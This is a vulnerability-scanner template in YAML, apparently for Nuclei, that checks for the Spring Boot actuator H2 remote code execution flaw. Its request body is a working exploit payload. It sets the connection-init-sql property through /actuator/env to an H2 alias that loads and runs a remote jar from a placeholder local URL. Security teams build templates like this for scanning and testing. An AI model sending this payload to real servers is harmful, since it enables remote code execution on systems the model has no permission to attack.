40 lines
1.3 KiB
YAML
40 lines
1.3 KiB
YAML
id: springboot-h2-db-rce
|
|
|
|
info:
|
|
name: Spring Boot H2 Database RCE
|
|
author: dwisiswant0
|
|
severity: critical
|
|
|
|
# Payload taken from @pyn3rd (Twitter), see reference[2].
|
|
|
|
# References:
|
|
# - [1] https://spaceraccoon.dev/remote-code-execution-in-three-acts-chaining-exposed-actuators-and-h2-database
|
|
# - [2] https://twitter.com/pyn3rd/status/1305151887964946432
|
|
# - [3] https://www.veracode.com/blog/research/exploiting-spring-boot-actuators
|
|
# - [4] https://github.com/spaceraccoon/spring-boot-actuator-h2-rce
|
|
|
|
requests:
|
|
- method: POST
|
|
path:
|
|
- "{{BaseURL}}/actuator/env"
|
|
headers:
|
|
Content-Type: "application/json"
|
|
body: |
|
|
{
|
|
"name": "spring.datasource.hikari.connection-init-sql",
|
|
"value":"CREATE ALIAS remoteUrl AS $$ import java.net.*;@CODE String remoteUrl() throws Exception { Class.forName(\"pop\", true, new URLClassLoader(new URL[]{new URL(\"http://127.0.0.1:9001/pop.jar\")})).newInstance();return null;}$$; CALL remoteUrl()"
|
|
}
|
|
matchers-condition: and
|
|
matchers:
|
|
- type: status
|
|
status:
|
|
- 200
|
|
- type: word
|
|
words:
|
|
- "\"spring.datasource.hikari.connection-init-sql\":\""
|
|
condition: and
|
|
part: body
|
|
- type: word
|
|
words:
|
|
- "application/vnd.spring-boot.actuator"
|
|
part: header |